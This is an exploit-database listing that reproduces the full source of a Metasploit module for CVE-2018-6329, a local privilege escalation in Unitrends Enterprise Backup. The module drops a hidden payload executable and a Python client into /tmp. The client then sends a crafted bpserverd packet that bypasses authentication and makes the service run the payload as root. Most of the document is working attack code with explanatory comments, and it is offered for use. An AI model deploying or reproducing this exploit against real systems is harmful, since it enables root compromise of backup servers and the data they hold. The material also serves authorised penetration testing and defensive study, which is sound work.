
Unitrends Enterprise Backup - bpserverd Privilege Escalation (Metasploit)

Published: 29 Nov 2018 00:00:00. Reported by: Metasploit. Type: exploitdb

Unitrends Enterprise Backup bpserverd Privilege Escalation: bypasses the service's authentication and allows root access by executing arbitrary commands.

Related
0day.today
Unitrends Enterprise Backup bpserverd Privilege Escalation Exploit
28 Nov 201800:00
zdt
Circl
CVE-2018-6329
28 Nov 201802:34
circl
CNVD
Unitrends Backup Remote Code Execution Vulnerability (CNVD-2018-07916)
28 Mar 201800:00
cnvd
CVE
CVE-2018-6329
14 Mar 201819:00
cve
Cvelist
CVE-2018-6329
14 Mar 201819:00
cvelist
Exploit DB
Unitrends UEB 10.0 - Root Remote Code Execution
16 Mar 201800:00
exploitdb
exploitpack
Unitrends UEB 10.0 - Root Remote Code Execution
16 Mar 201800:00
exploitpack
Metasploit
Unitrends Enterprise Backup bpserverd Privilege Escalation
28 Nov 201802:14
metasploit
NVD
CVE-2018-6329
14 Mar 201819:29
nvd
OSV
CVE-2018-6329
14 Mar 201819:29
osv
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Local privilege escalation against the Unitrends bpserverd service
# (CVE-2018-6329, EDB 44297).  The module writes two files into WritableDir
# on the session host: the payload executable and a small Python 2 client
# script.  The script connects to the bpserverd port on 127.0.0.1, parses a
# second port out of the data it receives, and sends a bpserverd command
# packet whose command string is the path of the dropped executable, which
# the service runs with root privilege (per the module description).
# Neither dropped file is registered for cleanup -- both
# register_file_for_cleanup calls below are commented out -- so the
# executable and the script remain on disk after the run.  No `check`
# method is defined, so the module does not verify that bpserverd is
# present before writing files.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  # Module metadata and options.  PrependFork is enabled by default so the
  # generated payload forks before running its stage (presumably so the
  # process bpserverd launches can exit promptly); WfsDelay gives the
  # handler two seconds to pick up the session.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Unitrends Enterprise Backup bpserverd Privilege Escalation',
      'Description'    => %q{
        It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
        has an issue in which its authentication can be bypassed.  A remote attacker could use this
        issue to execute arbitrary commands with root privilege on the target system.
        This is very similar to exploits/linux/misc/ueb9_bpserverd however it runs against the
        localhost by dropping a python script on the local file system.  Unitrends stopped
        bpserverd from listening remotely on version 10.
       },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Cale Smith', # @0xC413
          'Benny Husted', # @BennyHusted
          'Jared Arave', # @iotennui
          'h00die' # msf adaptations
        ],
      'DisclosureDate' => 'Mar 14 2018',
      'Platform'       => 'linux',
      'Arch'           => [ARCH_X86],
      'References'     =>
        [
          ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/000005691'],
          ['URL', 'http://blog.redactedsec.net/exploits/2018/04/20/UEB9_tcp.html'],
          ['EDB', '44297'],
          ['CVE', '2018-6329']
        ],
      'Targets'        =>
        [
          [ 'UEB <= 10.0', { } ]
        ],
      'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 2 },
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultTarget'  => 0
      }
    ))
    register_advanced_options([
      # Both dropped files (payload executable and Python script) go here.
      OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"]),
      # TCP port of the xinetd-fronted bpserverd listener on 127.0.0.1.
      OptInt.new("BPSERVERDPORT", [true, "Port bpserverd is running on", 1743])
    ])
  end

  # Drops the payload executable and the Python client script into
  # WritableDir, marks both executable with chmod, then runs the script with
  # the session's `python` so bpserverd executes the payload.
  #
  # Note that the `-c '<exe_path>'` argument handed to python on the last
  # line is never read: the script takes its command from the literal
  # interpolated into `cmd` inside the %Q string, not from sys.argv.  The
  # script's stdout is shown only when verbose output is enabled
  # (vprint_status).
  #
  # @return [void]
  def exploit

    pl = generate_payload_exe
    # Dot-prefixed random file name under WritableDir.
    exe_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    print_status("Writing payload executable to '#{exe_path}'")

    write_file(exe_path, pl)
    #register_file_for_cleanup(exe_path)

    # Python 2 client (print statements) for the bpserverd protocol.  RHOST
    # is fixed to the loopback address; XINETDPORT and cmd are interpolated
    # from BPSERVERDPORT and exe_path above.  The packet layout follows the
    # ueb9_bpserverd module linked inside the script.  Everything between
    # %Q{ and the closing } is script text, so the '#' lines in it are
    # Python comments and the doubled backslashes are what produce the
    # single-backslash escapes in the written file.
pe_script = %Q{
import socket
import binascii
import struct
import time
import sys

RHOST = '127.0.0.1'
XINETDPORT = #{datastore['BPSERVERDPORT']}
cmd = "#{exe_path}"

def recv_timeout(the_socket,timeout=2):
    the_socket.setblocking(0)
    total_data=[];data='';begin=time.time()
    while 1:
        #if you got some data, then break after wait sec
        if total_data and time.time()-begin>timeout:
            break
        #if you got no data at all, wait a little longer
        elif time.time()-begin>timeout*2:
            break
        try:
            data=the_socket.recv(8192)
            if data:
                total_data.append(data)
                begin=time.time()
            else:
                time.sleep(0.1)
        except:
            pass
    return ''.join(total_data)

print "[+] attempting to connect to xinetd on {0}:{1}".format(RHOST, str(XINETDPORT))

try:
  s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s1.connect((RHOST,XINETDPORT))
except:
  print "[!] Failed to connect!"
  exit()

data = s1.recv(4096)
bpd_port = int(data[-8:-3])

try:
  pass
  s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s2.connect((RHOST, bpd_port))
except:
  print "[!] Failed to connect!"
  s1.close()
  exit()

print "[+] Connected! Sending the following cmd to {0}:{1}".format(RHOST,str(XINETDPORT))
print "[+] '{0}'".format(cmd)

cmd_len = chr(len(cmd) + 3)
packet_len = chr(len(cmd) + 23)

#https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/exploits/linux/misc/ueb9_bpserverd.rb#L72
packet = '\\xa5\\x52\\x00\\x2d'
packet += '\\x00' * 3
packet += packet_len
packet += '\\x00' * 3
packet += '\\x01'
packet += '\\x00' * 3
packet += '\\x4c'
packet += '\\x00' * 3
packet += cmd_len
packet += cmd
packet += '\\x00' * 3

s1.send(packet)

data = recv_timeout(s2)

print data

s1.close()
}

    # Second dot-prefixed random file, holding the script text above.
    pes_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    print_status("Writing privesc script to '#{pes_path}'")

    write_file(pes_path, pe_script)
    #register_file_for_cleanup(pes_path)

    print_status("Fixing permissions")
    cmd_exec("chmod +x #{exe_path} #{pes_path}")

    # Runs the script; its connection messages and any bpserverd response
    # are printed only in verbose mode.  Both files stay on disk afterwards.
    vprint_status cmd_exec("python #{pes_path} -c '#{exe_path}'")
  end

end
